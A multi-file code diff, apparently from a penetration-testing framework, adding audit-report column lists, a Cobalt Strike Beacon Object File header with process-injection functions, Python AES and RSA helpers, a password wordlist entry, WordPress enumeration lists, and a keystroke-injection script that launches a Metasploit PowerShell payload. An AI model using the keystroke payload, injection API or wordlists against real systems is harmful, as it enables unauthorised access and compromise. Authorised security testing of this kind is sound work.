+# - PROCESS_ID
+# - PRIVILEGES_USED
+# - PRIVILEGES
+# - PROCESS_NAME
+# - NEW_SEC_DESC
+# - ORIGINAL_SEC_DESC
+# - NEW_PERMISSIONS
+# - ORIGINAL_PERMISSIONS
+# - ACL_CHANGE
+# - TRANSACTION_ID
+# - ACCESS_MASK
+- USERNAME
+# - RECORD_NUMBER
+- USER_SID
+# - ACCESS_TYPE
+# - ACCESS_TYPE_TEXT
+# - FORMAT_MESSAGE
+- USER_SAM_ACCOUNT_NAME
+- USER_DISPLAY_NAME
+- USER_PRINCIPAL_NAME
+- USER_GUID
+- USER_DISTINGUISH_NAME
+- USER_OU_GUID
+- USER_DEPARTMENT
+- USER_MANAGER_NAME
+- SOURCE_NAME
+# - LOG_FILE_NAME
+# - KEYWORDS_NAME
+# - TASK_CATEGORY_NAME
+# - TASK_CATEGORY_ID
+# - FILE_TYPE
+- SHARE_NAME
+# - EXTRA_COLUMN1
+# - EXTRA_COLUMN2
+# - EXTRA_COLUMN3
+# - EXTRA_COLUMN4
+# - EXTRA_COLUMN5
+# - EXTRA_COLUMN6
+# - EXTRA_COLUMN7
+# - EXTRA_COLUMN8
+# - EXTRA_COLUMN9
+# - EXTRA_COLUMN10
+- CONFIGURED_DOMAIN_NAME
+# - NEW_PRIVILEGES_USED
+AdapPowershellAuditLog:
+- UNIQUE_ID
+# - COMMAND_NAME
+# - COMMAND_PATH
+# - COMMAND_TYPE
+# - COMMAND_INVOCATION
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - EVENT_CATEGORY
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - HOST_APPLICATION
+- HOST_NAME
+# - SCRIPTBLOCK_ID
+# - RECORD_NUMBER
+# - SCRIPT_NAME
+# - SCRIPT_DATA
+# - SCRIPT_SNO
+# - SEVERITY
+# - TIME_GENERATED
+- CALLER_USER_NAME
+- CALLER_USER_SID
+# - TOTAL_NO
+# - MONITOR_ID
+# - EVENT_TYPE_TEXT
+# - FORMAT_MESSAGE
+# - SCRIPT_DATA_JSON
+AdapSysmonAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+- TIME_GENERATED
+# - RECORD_NUMBER
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - REMARKS
+# - FORMAT_MESSAGE
+- CALLER_USER_SID
+- CALLER_USER_NAME
+- CALLER_USER_DOMAIN
+- CALLER_USER_LOGON_ID
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+- CLIENT_MACHINE_DOMAIN
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_DISPLAY_NAME
+- PROCESS_NAME
+- PARENT_PROCESS_NAME
+# - PROCESS_ID
+# - FILE_NAME
+# - INTEGRITY_LEVEL
+# - QUERY_STRING
+# - PARENT_PROCESS_ID
+# - PARENT_CMD_LINE
+# - QUERY_STATUS
+# - ACCESS_TYPE_TEXT
+# - ACCESS_TIME
+# - CREATION_TIME
+# - PREVIOUS_CREATION_TIME
+# - PROCESS_GUID
+# - RULE_NAME
+# - LOADED_FILE
+# - HASHED_VALUE
+# - FOLDER_PATH
+# - PARENT_PROCESS_GUID
+# - SESSION_ID
+# - IS_SIGNED
+# - SIGNATURE
+# - SIGNATURE_STATUS
+# - IS_ARCHIVED
+# - THREAD_ID
+- SOURCE_IP_ADDRESS
+# - PRODUCT_DESCRIPTION
+- DESTINATION_IP_ADDRESS
+- DESTINATION_HOST_NAME
+# - PORT_NUMBER
+# - PARENT_PORT_NUMBER
+# - REGISTRY_NAME
+# - QUERY_RESULT
+# - SCHEMA_VERSION
+# - WORKING_DIRECTORY
+- COMPANY_NAME
+- SOURCE_HOST_NAME
+- CALLER_USER_LOGON_GUID
+# - PARENT_PORT_NAME
+# - SERVICE_VERSION
+# - FILE_VERSION
+# - PRODUCT_NAME
+# - PORT_NAME
+AdapDNSAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+# - EVENT_NUMBER
+- TIME_GENERATED
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - REMARKS
+# - DNS_SETTING
+# - LOOKUP
+# - DNS_SCOPE
+# - DNS_OBJECT_GUID
+# - DISTINATION_ZONE
+# - OLD_DIRECTORY_PARTITION
+# - USER_ACTION
+- CALLER_USER_DOMAIN
+- CALLER_USER_NAME
+- CLIENT_MACHINE_DOMAIN
+- CALLER_USER_LOGON_ID
+# - DNS_QUERY_NAME
+# - OBJECT_CLASS_TEXT
+# - DNS_SETTING_NAME
+- DISTINGUISHED_NAME
+# - OBJECT_GUID
+# - DNS_ZONE_NAME
+# # - REGISTRY_VALUE
+# - FORMAT_MESSAGE
+# - RECORD_NUMBER
+- CALLER_USER_SID
+# - DNS_SETTING_VALUE
+# - CORRELATION_ID
+# - ATTRIBUTES_NEW_VALUE
+# - ATTRIBUTES_OLD_VALUE
+# - TTL_VALUE
+# - DNS_MGMT_TYPE
+# - DNS_ZONE_TYPE
+# - DNS_ZONE_TYPE_STRING
+- CALLER_USER_DISPLAY_NAME
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_GUID
+# - OP_APPLN_CORRELATION_ID
+# - OP_TREE_DELETE
+# - DIRECTORY_PARTITION
+# - ROOT_CAUSE
+# - FILE_NAME
+# - VIRTUALIZATION_INSTANCE
+# - ERROR_CODE_TEXT
+# - DNS_RESPONSE_DATA
+- DNS_SERVER_NAME
+# - LINE_NUMBER
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+# - NEXT_SCAVENGE_SCHEDULE
+# - RECORD_NAME
+# - RUNNING_TIME
+# - TIME_OUT
+# - DNS_NODE
+# - DNS_ZONE_FILE
+- FOREST_NAME
+# - SCAVENGED_NODES
+# - SCAVENGED_PERC
+# - SCAVENGED_RECORDS
+# - SERVICE_NAMES
+# - SLEEPING_TIME
+# - VISITED_NODES
+# - VISITED_ZONES
+AdapADReplicationAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+- TIME_GENERATED
+# - RECORD_NUMBER
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+# - FORMAT_MESSAGE
+# - REMARKS
+- CALLER_USER_DOMAIN
+- CALLER_USER_NAME
+- CALLER_USER_SID
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_DISPLAY_NAME
+- CALLER_USER_LOGON_ID
+- CALLER_USER_GUID
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+- CLIENT_MACHINE_DOMAIN
+# - ALTERNATE_USER_ACTION
+# - DIRECTORY_PARTITION
+# - ERROR_CODE
+# - ERROR_CODE_TEXT
+# - EXTENDED_REQUEST_CODE
+# - FAILING_DNS_HOST
+# - HIGHEST_USN
+# - INTERSITE_TRANSPORT
+# - LAST_REPLICATION_DATE
+# - OBJECT_GUID
+# - OBJECT_NAME
+# - COMMON_NAME_PATH
+# - OPERATION
+# - REASON
+- REGISTRY_KEY
+# - REMOVE_LINGERING_OBJECTS
+# - SECONDARY_ERROR_VALUE
+- SERVICE_PRINCIPAL_NAME
+- SITE_NAME
+- SOURCE_DIRECTORY_SERVICE
+- SOURCE_DS_DOMAIN_NAME
+- SOURCE_DS_GUID
+- SOURCE_DS_NAME
+- SOURCE_DS_STARTING_ID
+# - THREAD_ID
+# - TIMEOUT_PERIOD
+# - TOMBSTONE_LIFE_TIME
+# - TRANSPORT_NAME
+# - USER_ACTION
+# - ATTRIBUTES_NAME
+# - ATTRIBUTES_VALUE
+# - SOURCE_DRA
+# - DESTINATION_DRA
+# - DESTINATION_DS_NAME
+# - DRS_OPTIONS
+# - REPL_EVENT_COUNT
+# - REPL_STATUS_CODE
+# - SESSION_ID
+# - START_USN
+# - END_USN
+# - TYPE_OF_CHANGE
@@ -0,0 +1,259 @@
+---
+DSPEmailAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - ATTACHMENT_ID
+# - ACCESS_TYPE
+# - ACCESS_TYPE_MESSAGE
+# - PROCESS_NAME
+- MAIL_FROM
+- MAIL_TO
+- MAIL_BCC
+- MAIL_CC
+# - MAIL_SUBJECT
+# - MAIL_SENT_TIME
+# - MAIL_CLASSFICATION_VALUE
+# - MAIL_CLASSFICATION
+# - PROFILE_ID
+- PROFILE_NAME
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DSPEndpointAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+# - SOURCE_ID
+- USER_SID
+- USERNAME
+# - PROCESS_ID
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - CREATION_TIME
+# - FILE_ATTRIBUTES
+# - UNC_NAME
+# - LOCATION
+# - MESSAGE
+# - FILE_FOLDER_NAME
+# - NEW_FILE_NAME
+# - IMAGE_FILE_NAME
+# - OLD_SHARE_PATH
+# - NEW_SHARE_PATH
+# - SHARE_ID
+# - IS_SUCCESS_EVENT
+# - IS_DIRECTORY
+# - IS_TRANSACTION
+# - ACTION_ID
+# - ACCESS_MASK
+# - THREAD_ID
+# - CALLBACK_MAJOR_ID
+# - CALLBACK_MINOR_ID
+# - PROFILE_ID
+# - USER_ID
+# - OLD_SACL
+# - NEW_SACL
+# - DIFF_SACL
+# - FILE_SIZE
+- CLIENT_IP
+- CLIENT_HOST
+- OWNER_INFO
+# - OTHERINFO_1
+# - OTHERINFO_2
+# - IS_SENSITIVE_DATA
+# - FILETYPE_EXTENSION
+# - FILETYPE_CATEGORY
+# - ACCESS_FROM
+# - EVENT_GENERATED_BY
+# - LOGIN_ID
+- LOGIN_NAME
+- OWNER_SID
+# - IS_USB_EVENT
+# - IS_NETWORK_COPY
+# - LAST_KNOWN_COPY
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DSPEndpointClassificationReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - CLASSIFICATION_ID
+# - CLASSIFICATION_VALUE
+# - CLASSIFICATION_MSG
+# - LOCAL_PATH
+# - FILE_FOLDER_NAME
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - CREATION_TIME
+# - FILE_ATTRIBUTES
+- FILE_OWNER
+- OWNER_SID
+# - FILE_SIZE
+# - FILETYPE_EXTENSION
+# - IS_HIDDEN
+# - MEDIA_FILE
+# - FILETYPE_EXTENSION_CATEGORY
+DSPEndpointIncidentReport:
+- INCIDENT_ID
+- SOURCE
+# - MODULE_NAME
+# - INCIDENT_TIME
+# - COMPLETION_TIME
+- TIME_GENERATED
+# - MESSAGE
+# - LOCATION
+# - ENDPOINT_ID
+# - INCIDENT_STATUS
+# - VIOLATED_POLICY
+# - DOMAIN_ID
+- ENDPOINT_NAME
+- USERNAME
+# - USER_ID
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - FILE_SIZE
+# - CREATION_TIME
+# - REPORT_GENERATION_ID
+# - NEW_FILE_NAME
+# - IMAGE_FILE_NAME
+# - FILE_FOLDER_NAME
+- USER_SID
+# - FILETYPE_EXTENSION
+# - IS_USB_EVENT
+- NOTIFY_NAME
+- MAIL_FROM
+- MAIL_TO
+- MAIL_BCC
+- MAIL_CC
+# - MAIL_SUBJECT
+# - MAIL_SENT_TIME
+# - MAIL_CLASSFICATION
+# - PRINTER_NAME
+# - FILENAME
+# - PORT_NAME
+- MACHINE_NAME
+- PRINTER_USERNAME
+# - TOTAL_PAGES
+- CLIENTIPLIST
+- URL
+# - CLASSIFICATION_VALUE
+# - INCIDENT_PROFILE_ID
+# - INCIDENT_PROFILE_NAME
+# - INCIDENT_SEVERITY
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+# - IS_NETWORK_COPY
+# - LAST_KNOWN_COPY
+- CLIENT_HOST
+DspEndpointPrinterAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - PRINTER_NAME
+# - FILENAME
+# - LOCAL_PATH
+# - PORT_NAME
+- MACHINE_NAME
+- PRINTER_USERNAME
+- NOTIFY_NAME
+# - TOTAL_PAGES
+# - FILE_SIZE
+# - CREATION_TIME
+- CLIENTIPLIST
+# - PROFILE_ID
+- PROFILE_NAME
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DspEndpointWebAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - NEW_FILE_NAME
+# - FILE_SIZE
+# - FILETYPE_EXTENSION
+# - PROCESS_NAME
+# - MESSAGE
+# - URL
+- CLIENT_IP
+# - PROFILE_ID
+- PROFILE_NAME
+DSPFileAnalysisAlerts:
+- INCIDENT_ID
+# - VIOLATED_PROFILE
+# - SERVER_ID
+# - DRIVE_LETTER
+# - SOURCE_ID
+- TIME_GENERATED
+# - SECURITY_ID
+- SERVERNAME
+# - FILE_ATTRIBUTES
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - FILE_SIZE
+# - CREATION_TIME
+# - REPORT_GENERATION_ID
+# - YEAR_CREATED
+# - FILE_FOLDER_NAME
+# - LOCAL_PATH
+# - FILETYPE_EXTENSION
+# - IS_HIDDEN
+# - IS_DIRECTORY
+# - IS_STALE
+# - NON_BUSINESS_FILE
+# - FILETYPE_EXTENSION_CATEGORY
+RAAlertHistory:
+- INCIDENT_ID
+# - FILE_NAME
+# - FILE_TYPE
+# - LOCATION
+- SERVER_NAME
+# - POLICY_ID
+# - POLICY_NAME
+- TIME_GENERATED
+# - NO_OF_OCCURRENCES
+- FILE_OWNER
+# - DATA_SOURCE
+# - RISK_SCORE
+# - ENTITY_ID
+RAIncidents:
+- INCIDENT_ID
+# - FILE_NAME
+# - FILE_TYPE
+# - LOCATION
+- SERVER_NAME
+# - POLICY_ID
+# - POLICY_NAME
+- TIME_GENERATED
+# - NO_OF_OCCURRENCES
+- FILE_OWNER
+# - DATA_SOURCE
+# - RAISED_INCIDENT
+# - SOURCE_ID
+# - RISK_SCORE
+# - VIOLATION_SCORE
+# - POLICY_SCORE
+# - PERMISSION_SCORE
+# - AUDIT_SCORE
+# - USER_SCORE
+# - SCORE_DESCRIPTION
+# - ENTITY_ID
@@ -71,6 +71,8 @@
                        <B N="V"><%= arg[:value].to_s %></B>
                        <% elsif arg[:value].is_a? String %>
                        <S N="V"><%= arg[:value].encode(xml: :text) %></S>
+                        <% elsif arg[:value].is_a? Nokogiri::XML::Element %>
+                        <%= arg[:value].to_s %>
                        <% end %>
                      </MS>
                    </Obj>
@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);
@@ -0,0 +1,229 @@
+import copy
+import struct
+import sys
+
+
+def chunks(lst, n):
+    for i in range(0, len(lst), n):
+        yield lst[i:i + n]
+
+
+def _cw(word):
+    return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3]
+
+
+def _s2b(text):
+    return list(ord(c)for c in text)
+
+
+def _b2s(binary):
+    return "".join(chr(b)for b in binary)
+
+
+if sys.version_info[0] >= 3:
+    xrange = range
+
+    def _s2b(text):
+        if isinstance(text, bytes):
+            return text
+        return [ord(c)for c in text]
+
+    def _b2s(binary):
+        return bytes(binary)
+else:
+    def bytes(s, e): return s
+
+
+def _gmul(a, b):
+    r = 0
+    while b:
+        if b & 1:
+            r ^= a
+        a <<= 1
+        if a > 255:
+            a ^= 0x11B
+        b >>= 1
+    return r
+
+
+def _mix(n, vec):
+    return sum(_gmul(n, v) << (24 - 8 * shift) for shift, v in enumerate(vec))
+
+
+def _ror32(n):
+    return (n & 255) << 24 | n >> 8
+
+
+def _rcon():
+    return [_gmul(1, 1 << n) for n in range(30)]
+
+
+def _Si(S):
+    return [S.index(n) for n in range(len(S))]
+
+
+def _mixl(S, vec):
+    return [_mix(s, vec) for s in S]
+
+
+def _rorl(T):
+    return [_ror32(t) for t in T]
+
+
+empty = struct.pack('')
+
+
+class AESCBC(object):
+    nrs = {16: 10, 24: 12, 32: 14}
+    rcon = _rcon()
+    S = [
+        99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43, 254, 215, 171,
+        118, 202, 130, 201, 125, 250, 89, 71, 240, 173, 212, 162, 175, 156,
+        164, 114, 192, 183, 253, 147, 38, 54, 63, 247, 204, 52, 165, 229, 241,
+        113, 216, 49, 21, 4, 199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226,
+        235, 39, 178, 117, 9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214, 179,
+        41, 227, 47, 132, 83, 209, 0, 237, 32, 252, 177, 91, 106, 203, 190, 57,
+        74, 76, 88, 207, 208, 239, 170, 251, 67, 77, 51, 133, 69, 249, 2, 127,
+        80, 60, 159, 168, 81, 163, 64, 143, 146, 157, 56, 245, 188, 182, 218,
+        33, 16, 255, 243, 210, 205, 12, 19, 236, 95, 151, 68, 23, 196, 167,
+        126, 61, 100, 93, 25, 115, 96, 129, 79, 220, 34, 42, 144, 136, 70, 238,
+        184, 20, 222, 94, 11, 219, 224, 50, 58, 10, 73, 6, 36, 92, 194, 211,
+        172, 98, 145, 149, 228, 121, 231, 200, 55, 109, 141, 213, 78, 169, 108,
+        86, 244, 234, 101, 122, 174, 8, 186, 120, 37, 46, 28, 166, 180, 198,
+        232, 221, 116, 31, 75, 189, 139, 138, 112, 62, 181, 102, 72, 3, 246,
+        14, 97, 53, 87, 185, 134, 193, 29, 158, 225, 248, 152, 17, 105, 217,
+        142, 148, 155, 30, 135, 233, 206, 85, 40, 223, 140, 161, 137, 13, 191,
+        230, 66, 104, 65, 153, 45, 15, 176, 84, 187, 22
+    ]
+    Si = _Si(S)
+    T1 = _mixl(S, (2, 1, 1, 3))
+    T2 = _rorl(T1)
+    T3 = _rorl(T2)
+    T4 = _rorl(T3)
+    T5 = _mixl(Si, (14, 9, 13, 11))
+    T6 = _rorl(T5)
+    T7 = _rorl(T6)
+    T8 = _rorl(T7)
+    U1 = _mixl(range(256), (14, 9, 13, 11))
+    U2 = _rorl(U1)
+    U3 = _rorl(U2)
+    U4 = _rorl(U3)
+
+    def __init__(self, key):
+        if len(key)not in (16, 24, 32):
+            raise ValueError('Invalid key size')
+        rds = self.nrs[len(key)]
+        self._Ke = [[0] * 4 for i in xrange(rds + 1)]
+        self._Kd = [[0] * 4 for i in xrange(rds + 1)]
+        rnd_kc = (rds + 1) * 4
+        KC = len(key) // 4
+        tk = [struct.unpack('>i', key[i:i + 4])[0]
+              for i in xrange(0, len(key), 4)]
+        rconpointer = 0
+        t = KC
+        for i in xrange(0, KC):
+            self._Ke[i // 4][i % 4] = tk[i]
+            self._Kd[rds - (i // 4)][i % 4] = tk[i]
+        while t < rnd_kc:
+            tt = tk[KC - 1]
+            tk[0] ^= ((self.S[(tt >> 16) & 255] << 24) ^ (self.S[(tt >> 8) & 255] << 16) ^ (
+                self.S[tt & 255] << 8) ^ self.S[(tt >> 24) & 255] ^ (self.rcon[rconpointer] << 24))
+            rconpointer += 1
+            if KC != 8:
+                for i in xrange(1, KC):
+                    tk[i] ^= tk[i - 1]
+            else:
+                for i in xrange(1, KC // 2):
+                    tk[i] ^= tk[i - 1]
+                tt = tk[KC // 2 - 1]
+                tk[KC // 2] ^= (self.S[tt & 255] ^ (self.S[(tt >> 8) & 255] << 8) ^
+                                (self.S[(tt >> 16) & 255] << 16) ^ (self.S[(tt >> 24) & 255] << 24))
+                for i in xrange(KC // 2 + 1, KC):
+                    tk[i] ^= tk[i - 1]
+            j = 0
+            while j < KC and t < rnd_kc:
+                self._Ke[t // 4][t % 4] = tk[j]
+                self._Kd[rds - (t // 4)][t % 4] = tk[j]
+                j += 1
+                t += 1
+        for r in xrange(1, rds):
+            for j in xrange(0, 4):
+                tt = self._Kd[r][j]
+                self._Kd[r][j] = (self.U1[(tt >> 24) & 255] ^ self.U2[(
+                    tt >> 16) & 255] ^ self.U3[(tt >> 8) & 255] ^ self.U4[tt & 255])
+
+    def _encdec(self, data, K, s, S, L1, L2, L3, L4):
+        if len(data) != 16:
+            raise ValueError('wrong block length')
+        rds = len(K) - 1
+        (s1, s2, s3) = s
+        a = [0, 0, 0, 0]
+        t = [(_cw(data[4 * i:4 * i + 4]) ^ K[0][i])for i in xrange(0, 4)]
+        for r in xrange(1, rds):
+            for i in xrange(0, 4):
+                a[i] = L1[(t[i] >> 24) & 255]
+                a[i] ^= L2[(t[(i + s1) % 4] >> 16) & 255]
+                a[i] ^= L3[(t[(i + s2) % 4] >> 8) & 255]
+                a[i] ^= L4[t[(i + s3) % 4] & 255] ^ K[r][i]
+            t = copy.copy(a)
+        rst = []
+        for i in xrange(0, 4):
+            tt = K[rds][i]
+            rst.append((S[(t[i] >> 24) & 255] ^ (tt >> 24)) & 255)
+            rst.append((S[(t[(i + s1) % 4] >> 16) & 255] ^ (tt >> 16)) & 255)
+            rst.append((S[(t[(i + s2) % 4] >> 8) & 255] ^ (tt >> 8)) & 255)
+            rst.append((S[t[(i + s3) % 4] & 255] ^ tt) & 255)
+        return rst
+
+    def enc_in(self, pt):
+        return self._encdec(
+            pt, self._Ke, [
+                1, 2, 3], self.S, self.T1, self.T2, self.T3, self.T4)
+
+    def dec_in(self, ct):
+        return self._encdec(
+            ct, self._Kd, [
+                3, 2, 1], self.Si, self.T5, self.T6, self.T7, self.T8)
+
+    def pad(self, pt):
+        c = 16 - (len(pt) % 16)
+        return pt + bytes(chr(c) * c, 'utf-8')
+
+    def unpad(self, pt):
+        c = pt[-1]
+        if not isinstance(c, int):
+            c = ord(c)
+        return pt[:-c]
+
+    def encrypt(self, iv, pt):
+        if len(iv) != 16:
+            raise ValueError('initialization vector must be 16 bytes')
+        else:
+            self._lcb = _s2b(iv)
+        pt = self.pad(pt)
+        return empty.join([self.enc_b(b)for b in chunks(pt, 16)])
+
+    def enc_b(self, pt):
+        if len(pt) != 16:
+            raise ValueError('plaintext block must be 16 bytes')
+        pt = _s2b(pt)
+        pcb = [(p ^ l)for (p, l) in zip(pt, self._lcb)]
+        self._lcb = self.enc_in(pcb)
+        return _b2s(self._lcb)
+
+    def decrypt(self, iv, ct):
+        if len(iv) != 16:
+            raise ValueError('initialization vector must be 16 bytes')
+        else:
+            self._lcb = _s2b(iv)
+        if len(ct) % 16 != 0:
+            raise ValueError('ciphertext must be a multiple of 16')
+        return self.unpad(empty.join([self.dec_b(b)for b in chunks(ct, 16)]))
+
+    def dec_b(self, ct):
+        if len(ct) != 16:
+            raise ValueError('ciphertext block must be 16 bytes')
+        cb = _s2b(ct)
+        pt = [(p ^ l)for (p, l) in zip(self.dec_in(cb), self._lcb)]
+        self._lcb = cb
+        return _b2s(pt)
@@ -0,0 +1,77 @@
+import sys
+import math
+import random
+import binascii as ba
+import os
+from struct import unpack as u
+from struct import pack
+is2 = sys.version_info[0] < 3
+
+
+def bt(b):
+    if is2:
+        return b
+    return ord(b)
+
+
+def b2i(b):
+    return int(ba.b2a_hex(b), 16)
+
+
+def i2b(i):
+    h = '%x' % i
+    if len(h) % 2 == 1:
+        h = '0' + h
+    if not is2:
+        h = h.encode('utf-8')
+    return ba.a2b_hex(h)
+
+
+def rs(a, o):
+    if a[o] == bt(pack('B', 0x81)):
+        return (u('B', a[o + 1])[0], 2 + o)
+    elif a[o] == bt(pack('B', 0x82)):
+        return (u('>H', a[o + 1:o + 3])[0], 3 + o)
+
+
+def ri(b, o):
+    i, o = rs(b, o)
+    return (b[o:o + i], o + i)
+
+
+def b2me(b):
+    if b[0] != bt(pack('B', 0x30)):
+        return (None, None)
+    _, o = rs(b, 1)
+    if b[o] != bt(pack('B', 2)):
+        return (None, None)
+    (m, o) = ri(b, o + 1)
+    if b[o] != bt(pack('B', 2)):
+        return (None, None)
+    e = b[o + 2:]
+    return (b2i(m), b2i(e))
+
+
+def der2me(d):
+    if d[0] != bt(pack('B', 0x30)):
+        return (None, None)
+    _, o = rs(d, 1)
+    while o < len(d):
+        if d[o] == bt(pack('B', 0x30)):
+            o += u('B', d[o + 1:o + 2])[0]
+        elif d[o] == bt(pack('B', 0x05)):
+            o += 2
+        elif d[o] == bt(pack('B', 0x03)):
+            _, o = rs(d, o + 1)
+            return b2me(d[o + 1:])
+        else:
+            return (None, None)
+
+
+def rsa_enc(der, msg):
+    m, e = der2me(der)
+    h = pack('BB', 0, 2)
+    d = pack('B', 0)
+    l = 256 - len(h) - len(msg) - len(d)
+    p = os.urandom(512).replace(pack('B', 0), pack(''))
+    return i2b(pow(b2i(h + p[:l] + d + msg), e, m))
@@ -0,0 +1,2 @@
+$someText = "Hello!" ; $someText > "C:\flag.txt"
+
@@ -0,0 +1,14 @@
+REM Title: Metasploit Generated Payload
+REM Description: Opens a payload via powershell on the system
+REM Version: 1.0
+REM Open start menu
+REM We use cmd.exe since the powershell payload is likely too long for the run bar
+GUI r
+DELAY 750
+STRING cmd.exe
+DELAY 750
+ENTER
+DELAY 750
+STRING powershell.exe %{var_payload}
+DELAY 750
+ENTER
@@ -1,3 +1,4 @@
 calvin
 123456
 password
+user1234
@@ -54,3 +54,4 @@ easy-wp-smtp
 duplicator_download
 custom-registration-form-builder-with-submission-manager
 woocommerce-abandoned-cart
+elementor
@@ -168,17 +168,21 @@ aanews
 aanglo
 aapna
 aarambha-blogger
+aarambha-real-estate
 aargee
 aari
 aaron
 aaron-modified-intent
 aartus
+aasta
+aasta-light
 aav1
 aazeen
 ab
 ab-folio
 abacus
 abacus-hotel
+abadir
 abalane
 abaris
 abaya
@@ -204,6 +208,8 @@ abingle
 abiolian-business
 abisteel
 abitno
+ablanka
+ablanna
 able
 abletone
 ablog
@@ -239,6 +245,7 @@ abythens
 ac-board
 ac-care
 ac-repair
+ac-repair-services
 academic
 academic-clear
 academic-education
@@ -289,6 +296,8 @@ accountant-child
 accountantlaw
 accountants-theme
 accounting
+accounting-techup
+accountra
 accssesspress-stdasore
 ace
 ace-blog
@@ -312,6 +321,7 @@ acommerce
 acool
 acosminblogger
 acoustics
+across
 act-child
 act-theme-lite
 actify
